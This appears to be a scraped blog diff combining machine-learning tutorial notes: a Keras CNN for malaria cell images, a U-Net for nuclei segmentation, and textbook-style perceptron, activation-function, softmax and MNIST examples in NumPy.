drop4 = keras.layers.Dropout(rate=0.2)(norm4)
• Output layer
out = keras.layers.Dense(2, activation='sigmoid')(drop4)
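
With two one-hot encoded classes and categorical_crossentropy, a softmax output is the more conventional pairing; the two-unit sigmoid above works but is slightly unusual. A hedged alternative, not the author's choice:

out = keras.layers.Dense(2, activation='softmax')(drop4)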
model = keras.Model(inputs=inp, outputs=out)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
from tensorflow.keras import utils
from keras.utils.vis_utils import model_to_dot

utils.plot_model(model, 'model1.png', show_shapes=True, show_dtype=True, show_layer_names=True)

                      png

model.summary()
                      Model: "model"
                       _________________________________________________________________
                        Layer (type)                Output Shape              Param #   

from sklearn.model_selection import train_test_split
from keras.utils import to_categorical

X_train, X_test, y_train, y_test = train_test_split(dataset,
                                                    to_categorical(np.array(label)),
                                                    test_size=0.20,
                                                    random_state=0)

history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
                      Epoch 1/25
                       12/12 [==============================] - 9s 99ms/step - loss: 0.9405 - accuracy: 0.6444 - val_loss: 31.2568 - val_accuracy: 0.5625
                       Epoch 2/25
print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
                      7/7 [==============================] - 0s 17ms/step - loss: 1.7793 - accuracy: 0.6950
                       Test_Accuracy: 69.50%
                       
import matplotlib.pyplot as plt

f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
t = f.suptitle('CNN Performance', fontsize=12)
f.subplots_adjust(top=0.85, wspace=0.3)

# Plot training & validation accuracy
max_epoch = len(history.history['accuracy']) + 1
epoch_list = list(range(1, max_epoch))
ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
ax1.set_xticks(np.arange(1, max_epoch, 5))
ax1.set_ylabel('Accuracy Value')
ax1.set_xlabel('Epoch')
ax1.set_title('Accuracy')
l1 = ax1.legend(loc="best")

# Plot training & validation loss
ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
ax2.set_xticks(np.arange(1, max_epoch, 5))
ax2.set_ylabel('Loss Value')
ax2.set_xlabel('Epoch')
ax2.set_title('Loss')
l2 = ax2.legend(loc="best")

                      png

From the curves we can infer that too many epochs were used and overfitting has set in.
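
A common remedy (not used in this run) is Keras's EarlyStopping callback, which halts training once the validation loss stops improving. A minimal sketch, assuming the model and split from above:

from keras.callbacks import EarlyStopping

# Stop after 3 epochs without val_loss improvement and keep the best weights
early_stop = EarlyStopping(monitor='val_loss', patience=3, restore_best_weights=True)
history = model.fit(np.array(X_train), y_train, batch_size=64, epochs=25,
                    validation_split=0.1, shuffle=False, callbacks=[early_stop])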


• Save the model
model.save('malaria_cnn.h5')

                      png

DIP-Python tutorials for image processing and machine learning (73-78) - U-net

74 - Image Segmentation using U-Net - Part 2 (Defining U-Net in Python using Keras)

import tensorflow as tf

IMG_WIDTH = 128
IMG_HEIGHT = 128
IMG_CHANNELS = 3

Build the model

• concatenate layer

                      inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
                      s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

                      # Contraction path 收缩路径
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
                      c1 = tf.keras.layers.Dropout(0.1)(c1)
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
                      p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
                      c2 = tf.keras.layers.Dropout(0.1)(c2)
                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
                      p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
                      c3 = tf.keras.layers.Dropout(0.2)(c3)
                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
                      p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
                      c4 = tf.keras.layers.Dropout(0.2)(c4)
                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
                      p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
                      c5 = tf.keras.layers.Dropout(0.3)(c5)
                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

                      # Expansive path 延展路径
                      u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
                      u6 = tf.keras.layers.concatenate([u6, c4])
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
                      c6 = tf.keras.layers.Dropout(0.2)(c6)
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

                      u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
                      u7 = tf.keras.layers.concatenate([u7, c3])
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
                      c7 = tf.keras.layers.Dropout(0.2)(c7)
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

                      u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
                      u8 = tf.keras.layers.concatenate([u8, c2])
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
                      c8 = tf.keras.layers.Dropout(0.1)(c8)
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

                      u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
                      u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
                      c9 = tf.keras.layers.Dropout(0.1)(c9)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

                      outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

                      model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
                      model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
                      model.summary()
                      Model: "model"
                       __________________________________________________________________________________________________
                        Layer (type)                   Output Shape         Param #     Connected to                     
 ...

from tensorflow.keras import utils
from keras.utils.vis_utils import model_to_dot

utils.plot_model(model, 'model1.png', show_shapes=True, show_dtype=True, show_layer_names=True)
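Note: plot_model renders the graph via Graphviz, so the pydot and graphviz packages must be installed for this call to work.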


75 - Image Segmentation using U-Net - Part 3 (What are trainable parameters)

Explains how the number of trainable parameters in a neural network is calculated.
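As a quick illustration of the rule (a sketch of my own, not code from the video): for a Conv2D layer the parameter count is kernel_height × kernel_width × input_channels × filters, plus one bias per filter. Checking this against the first convolution of the U-Net defined above:

# Trainable parameters of the first Conv2D(16, (3, 3)) layer on a 3-channel input
kernel_h, kernel_w, in_channels, filters = 3, 3, 3, 16
params = kernel_h * kernel_w * in_channels * filters + filters  # weights + biases
print(params)  # 448, matching the first Conv2D row of model.summary()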


                      Module: tf.keras.callbacks | TensorFlow v2.11.0 (google.cn)

checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
]
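With these settings, EarlyStopping stops training once val_loss has failed to improve for two consecutive epochs, and the TensorBoard callback writes event files under logs/ that can be visualized later.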

77 - Image Segmentation using U-Net - Part 5 (Understanding the data)

Get the dataset: 2018 Data Science Bowl | Kaggle
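Each sample in this dataset is a folder named by its id, containing an images/ directory with a single <id>.png and a masks/ directory holding one binary mask per nucleus. The loading loop in the next section relies on this layout, which is why the per-nucleus masks are merged into one mask with np.maximum.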

78 - Image Segmentation using U-Net - Part 6 (Running the code and understanding results)

import tensorflow as tf
import os
import numpy as np

IMG_WIDTH = 128
IMG_HEIGHT = 128
IMG_CHANNELS = 3

TRAIN_PATH = 'stage1_train/'
TEST_PATH = 'stage1_test/'

train_ids = next(os.walk(TRAIN_PATH))[1]
test_ids = next(os.walk(TEST_PATH))[1]

X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)  # Y is a binary image (mask)

                    Resizing training images and masks

import random
from tqdm import tqdm
from skimage.io import imread, imshow
from skimage.transform import resize
import matplotlib.pyplot as plt

seed = 42
np.random.seed(seed)  # fixed: the original assigned to np.random.seed instead of calling it

print('Resizing training images and masks')
for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
    path = TRAIN_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]  # read the image
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)  # resize to 128x128
    X_train[n] = img  # fill empty X_train with values from img
    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
    for mask_file in next(os.walk(path + '/masks/'))[2]:
        mask_ = imread(path + '/masks/' + mask_file)
        mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                                      preserve_range=True), axis=-1)
        mask = np.maximum(mask, mask_)  # merge the per-nucleus masks into one image

    Y_train[n] = mask  # fill empty Y_train with the combined mask
                    Resizing training images and masks
                     
                     
                     100%|██████████| 670/670 [04:38<00:00,  2.41it/s]
                     

                    Resizing test images

X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
sizes_test = []
print('Resizing test images')
for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
    path = TEST_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    sizes_test.append([img.shape[0], img.shape[1]])  # remember the original sizes
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_test[n] = img

print('Done!')
                    Resizing test images
                     
                     

# Sanity check: display a random training image and its mask
image_x = random.randint(0, len(train_ids) - 1)  # fixed off-by-one: randint is inclusive at both ends
imshow(X_train[image_x])
plt.show()


imshow(np.squeeze(Y_train[image_x]))
plt.show()


inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs)  # scale the integer pixel values to floats in [0, 1]

# Contraction path
c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
c1 = tf.keras.layers.Dropout(0.1)(c1)
c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
c2 = tf.keras.layers.Dropout(0.1)(c2)
c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
c3 = tf.keras.layers.Dropout(0.2)(c3)
c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
c4 = tf.keras.layers.Dropout(0.2)(c4)
c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
c5 = tf.keras.layers.Dropout(0.3)(c5)
c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

# Expansive path
u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
u6 = tf.keras.layers.concatenate([u6, c4])
c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
c6 = tf.keras.layers.Dropout(0.2)(c6)
c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
u7 = tf.keras.layers.concatenate([u7, c3])
c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
c7 = tf.keras.layers.Dropout(0.2)(c7)
c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
u8 = tf.keras.layers.concatenate([u8, c2])
c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
c8 = tf.keras.layers.Dropout(0.1)(c8)
c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
c9 = tf.keras.layers.Dropout(0.1)(c9)
c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

ModelCheckpoint

checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
callbacks = [
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')
]  # note: checkpointer is created but never added to this list, so no checkpoint is written as-is

results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
                    Epoch 1/25
                     38/38 [==============================] - 20s 280ms/step - loss: 0.5785 - accuracy: 0.7459 - val_loss: 0.3360 - val_accuracy: 0.7809
                     Epoch 2/25
 ...

idx = random.randint(0, len(X_train) - 1)  # fixed off-by-one: randint is inclusive at both ends

preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
preds_test = model.predict(X_test, verbose=1)

# Binarize the predicted probability maps at a 0.5 threshold
preds_train_t = (preds_train > 0.5).astype(np.uint8)
preds_val_t = (preds_val > 0.5).astype(np.uint8)
preds_test_t = (preds_test > 0.5).astype(np.uint8)
                    19/19 [==============================] - 5s 161ms/step
                     3/3 [==============================] - 0s 91ms/step
                     3/3 [==============================] - 1s 417ms/step

# Perform a sanity check on a random training sample
ix = random.randint(0, len(preds_train_t) - 1)
imshow(X_train[ix])
plt.show()
imshow(np.squeeze(Y_train[ix]))
plt.show()
imshow(np.squeeze(preds_train_t[ix]))
plt.show()


                    C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\io\_plugins\matplotlib_plugin.py:150: UserWarning: Low image data range; displaying image with stretched contrast.
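This warning is harmless here: the thresholded mask only contains the values 0 and 1, so skimage stretches the contrast in order to display it.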

# Perform a sanity check on a random validation sample
ix = random.randint(0, len(preds_val_t) - 1)
imshow(X_train[int(X_train.shape[0]*0.9):][ix])
plt.show()
imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
plt.show()
imshow(np.squeeze(preds_val_t[ix]))
plt.show()


Visualizing the results

!tensorboard --logdir=logs/ --host localhost --port 8088


diff --git "a/posts/DL-深度学习入门-基于Python的理论与实现-2-感知机/index.html" "b/posts/DL-深度学习入门-基于Python的理论与实现-2-感知机/index.html"

2.3 Implementing the perceptron

2.3.1 A simple implementation

def AND(x1, x2):
    """
    Simulate an AND gate.
    """
    w1, w2, theta = 0.5, 0.5, 0.7  # weights w1 = 0.5, w2 = 0.5, threshold 0.7
    tmp = x1 * w1 + x2 * w2
    if tmp <= theta:
        return 0
    elif tmp > theta:
        return 1

print(AND(0, 0))
print(AND(1, 0))
print(AND(0, 1))
print(AND(1, 1))
                    0
                     0
                     0
 1
 

2.3.2 Introducing weights and a bias

Introduce weights and a bias by replacing $\theta$ with $-b$:

$$y=\left\{\begin{matrix}0\quad(b+w_1x_1+w_2x_2\le 0)\\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

Here $b$ is called the bias, and $w_1$ and $w_2$ are called weights. The perceptron multiplies the input signals by the weights, sums them, adds the bias, and outputs 1 if the result is greater than 0, otherwise 0.

import numpy as np

x = np.array([0, 1])      # inputs
w = np.array([0.5, 0.5])  # weights
b = -0.7                  # bias
w * x
                    array([0. , 0.5])
                     
np.sum(w * x)
                    0.5
                     
np.sum(w * x) + b  # approximately -0.2 (rounding error from floating-point arithmetic)
                    -0.19999999999999996
                     

2.3.3 Implementation with weights and a bias

def AND(x1, x2):
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])
    b = -0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1

print(AND(0, 0))
print(AND(1, 0))
print(AND(0, 1))
print(AND(1, 1))
                    0
                     0
                     0
                     1
                     

The value of the bias determines how easily the neuron fires. Here we call $w_1$ and $w_2$ the weights and $b$ the bias, but depending on context all of $b$, $w_1$ and $w_2$ are sometimes referred to collectively as weights (treating 1 as an extra input, $b$ is the parameter that adjusts how easily the neuron fires, i.e. how readily it outputs 1), as the sketch below illustrates.
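A small numeric sketch of my own (not from the book): keeping the weights fixed at 0.5 and changing only the bias makes the same neuron behave like an AND gate or like an OR gate.

import numpy as np

def fires(x1, x2, b):
    # returns 1 if the weighted sum of the inputs plus the bias b exceeds 0
    return int(np.sum(np.array([0.5, 0.5]) * np.array([x1, x2])) + b > 0)

print(fires(1, 0, b=-0.7))  # 0: with bias -0.7 the neuron needs both inputs active (AND-like)
print(fires(1, 0, b=-0.2))  # 1: with bias -0.2 one active input is enough (OR-like)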

def NAND(x1, x2):
    """
    Simulate a NAND gate.
    """
    x = np.array([x1, x2])
    w = np.array([-0.5, -0.5])  # only the weights and bias differ from AND!
    b = 0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1

print(NAND(0, 0))
print(NAND(1, 0))
print(NAND(0, 1))
print(NAND(1, 1))
                    1
                     1
                     1
                     0
                     
def OR(x1, x2):
    """
    Simulate an OR gate.
    """
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])  # only the bias differs from AND!
    b = -0.2
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1

print(OR(0, 0))
print(OR(1, 0))
print(OR(0, 1))
print(OR(1, 1))
                    0
                     1
                     1
 1
 


2.5.2 Implementing the XOR gate

def XOR(x1, x2):
    """
    Implement an XOR gate using the AND, NAND and OR functions defined earlier.
    """
    s1 = NAND(x1, x2)
    s2 = OR(x1, x2)
    y = AND(s1, s2)
    return y

print(XOR(0, 0))
print(XOR(1, 0))
print(XOR(0, 1))
print(XOR(1, 1))
                    0
                     1
                     1
 0
 

diff --git "a/posts/DL-深度学习入门-基于Python的理论与实现-3-神经网络/index.html" "b/posts/DL-深度学习入门-基于Python的理论与实现-3-神经网络/index.html"

An activation function used very often in neural networks is the sigmoid function:

                    $$h(x)=\frac{1}{1+\exp(-x)}$$

3.2.2 Implementing the step function

def step_function(x):
    """
    Step function (accepts a NumPy array as its argument).
    """
    y = x > 0
    return y.astype(int)

Applying a comparison operator to a NumPy array applies it to every element and produces a boolean array: elements of x greater than 0 become True, elements less than or equal to 0 become False, yielding the new array y. But the step function we want outputs the int values 0 or 1, so the elements of y must be cast from bool to int.

import numpy as np

x = np.array([-1.0, 1.0, 2.0])
y = x > 0
y
                    array([False,  True,  True])
                     
y = y.astype(int)
y
                    array([0, 1, 1])
                     

3.2.3 Graphing the step function

import numpy as np
import matplotlib.pyplot as plt


def step_function(x):  # fixed typo: the original defined "strp_function" while calling step_function
    return np.array(x > 0, dtype=int)

x = np.arange(-5.0, 5.0, 0.1)
y = step_function(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)  # set the range of the y axis
plt.show()


3.2.4 Implementing the sigmoid function

def sigmoid(x):
    return 1 / (1 + np.exp(-x))

x = np.array([-1.0, 1.0, 2.0])
sigmoid(x)  # thanks to NumPy broadcasting, an operation between a scalar and an array is applied to each element
                    array([0.26894142, 0.73105858, 0.88079708])
                     
x = np.arange(-5.0, 5.0, 0.1)
y = sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)
plt.show()


3.2.6 Nonlinear functions

                      @@ -464,8 +462,8 @@

3.2.7 The ReLU function

Historically, the sigmoid function has been used in neural networks since early on, whereas more recently the **ReLU (Rectified Linear Unit)** function has become the main choice.

$$h(x)=\left\{\begin{matrix}x\quad(x>0)\\0\quad(x\le 0)\end{matrix}\right.$$

def relu(x):
    return np.maximum(0, x)

x = np.arange(-5.0, 5.0, 0.1)
y = relu(x)
plt.plot(x, y)
plt.ylim(-0.1, 5)
plt.show()


3.3 Operations on multidimensional arrays

3.3.3 Matrix products in neural networks

$$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\\ 2 & 4 & 6 \end{pmatrix}$$

When implementing this network, pay attention to the shapes of $\mathbf{X}$, $\mathbf{W}$ and $\mathbf{Y}$; in particular, the corresponding dimensions of $\mathbf{X}$ and $\mathbf{W}$ must have the same number of elements.

X = np.array([1, 2])
W = np.array([[1, 3, 5], [2, 4, 6]])
Y = np.dot(X, W)
Y
                      array([ 5, 11, 17])
                       

Using np.dot (the dot product of multidimensional arrays), the whole result $\mathbf{Y}$ can be computed in a single step.

import numpy as np

X = np.array([1.0, 0.5])
W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
B1 = np.array([[0.1, 0.2, 0.3]])

print(W1.shape)
print(X.shape)
print(B1.shape)
                      (2, 3)
                       (2,)
                       (1, 3)
                       
A1 = np.dot(X, W1) + B1
A1
                      array([[0.3, 0.7, 1.1]])
                       
Z1 = sigmoid(A1)
Z1
                      array([[0.57444252, 0.66818777, 0.75026011]])
                       

Implementing the signal transmission from layer 1 to layer 2:


W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
B2 = np.array([0.1, 0.2])

print(Z1.shape)
print(W2.shape)
print(B2.shape)
                      (1, 3)
                       (3, 2)
                       (2,)
                       
A2 = np.dot(Z1, W2) + B2
Z2 = sigmoid(A2)

Implementing the signal transmission from layer 2 to the output layer:


def identity_function(x):
    """
    Here we define identity_function() (the "identity function") and use it as
    the activation function of the output layer. The identity function returns
    its input unchanged, so defining it is not strictly necessary in this
    example; we do so only to keep the flow consistent with the earlier layers.
    """
    return x

W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
B3 = np.array([0.1, 0.2])

A3 = np.dot(Z2, W3) + B3
Y = identity_function(A3)  # or Y = A3

The output layer's activation function is written $\sigma()$, to distinguish it from the hidden layers' activation function $h()$.

The activation function of the output layer is chosen according to the nature of the problem being solved.

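(The standard choices, stated here as common practice rather than as a quotation from this excerpt, are the identity function for regression, the sigmoid function for two-class classification, and the softmax function for multi-class classification.)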

3.4.3 Implementation summary

def init_network():
    """
    Following the usual convention for implementing neural networks, only the
    weights are written with capital letters (W1, ...); everything else
    (biases, intermediate results, etc.) uses lowercase.
    """
    network = {}
    network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    network['b1'] = np.array([0.1, 0.2, 0.3])
    network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    network['b2'] = np.array([0.1, 0.2])
    network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
    network['b3'] = np.array([0.1, 0.2])

    return network


def forward(network, x):
    """
    Propagate the signal from the input toward the output.
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = identity_function(a3)
    return y


network = init_network()
x = np.array([1.0, 0.5])
y = forward(network, x)
print(y)
                        [0.31682708 0.69627909]
                         

3.5 Designing the output layer

3.5.1 Identity function and softmax function

$$y_k=\frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)}$$

def softmax(a):
    exp_a = np.exp(a)
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a

    return y

3.5.2 Caveats when implementing the softmax function

Because the computation involves exponentials, it can overflow.

We improve it as follows:
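The countermeasure rests on the fact that adding any constant $C'$ inside the exponentials leaves softmax unchanged:

$$y_k=\frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)}=\frac{\exp(a_k+C')}{\sum^n_{i=1}\exp(a_i+C')}$$

In practice, $C'$ is taken to be minus the largest element of the input, as the example below shows.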

                        @@ -542,7 +540,7 @@

                        a = np.array([1010, 1000, 990])
                        np.exp(a) / np.sum(np.exp(a))
                        C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: overflow encountered in exp
                           np.exp(a) / np.sum(np.exp(a))
                         C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: invalid value encountered in true_divide
                        @@ -554,19 +552,19 @@ 

c = np.max(a)
a - c
array([  0, -10, -20])

np.exp(a-c) / np.sum(np.exp(a-c))
array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])
                         

Putting this together, we can implement the softmax function as follows.

def softmax(a):
    c = np.max(a)
    exp_a = np.exp(a - c)  # overflow countermeasure
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a
    return y

3.5.3 Properties of the softmax function

a = np.array([0.3, 2.9, 4.0])
y = softmax(a)
y
array([0.01821127, 0.24519181, 0.73659691])

np.sum(y)
1.0
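The outputs of softmax lie between 0 and 1 and sum to 1, so they can be interpreted as probabilities. Also, because $\exp$ is monotonically increasing, softmax never changes the relative order of its inputs: np.argmax(y) equals np.argmax(a), which is why the softmax stage is commonly omitted at inference time.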
                         
                          @@ -586,7 +584,7 @@

To use mnist.py, the current directory must be one of ch01, ch02, ch03, ..., ch08. With the load_mnist() function in mnist.py, the MNIST data can then be read in easily, as follows.

import sys, os
sys.path.append(os.pardir)  # setting to allow importing files from the parent directory
from dataset.mnist import load_mnist

# The first call takes a few minutes...
# load_mnist returns the MNIST data as ((train images, train labels), (test images, test labels))
(x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
        Downloading train-images-idx3-ubyte.gz ... 
         Done
         Downloading train-labels-idx1-ubyte.gz ... 
        @@ -606,14 +604,14 @@ 

# print the shape of each dataset
print(x_train.shape) # (60000, 784)
print(t_train.shape) # (60000,)
print(x_test.shape) # (10000, 784)
print(t_test.shape) # (10000,)
        (60000, 784)
         (60000,)
         (10000, 784)
         (10000,)
         

Let's display an MNIST image and check the data at the same time.

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist
from PIL import Image
import matplotlib.pyplot as plt


def img_show(img):
    pil_img = Image.fromarray(np.uint8(img))
    pil_img.show()

(x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
img = x_train[0]
label = t_train[0]
print(label) # 5

print(img.shape) # (784,)
img = img.reshape(28, 28)  # reshape the image back to its original dimensions
print(img.shape) # (28, 28)
plt.imshow(img, cmap='gray')
        5
         (784,)
         (28, 28)
        @@ -639,30 +637,30 @@ 

def get_data():
    """
    Load the data.
    """
    (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, flatten=True, one_hot_label=False)
    return x_test, t_test

With normalize set to True, the function internally divides each pixel value by 255 so that the data fall in the range 0.0 to 1.0. Restricting data to a certain range like this is called normalization. More generally, applying a fixed transformation to a neural network's input data is called pre-processing.
Here, as a form of pre-processing of the input images, we normalize them.
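In code terms, the conversion inside load_mnist amounts to something like the following one-line sketch (not necessarily the library's exact source):

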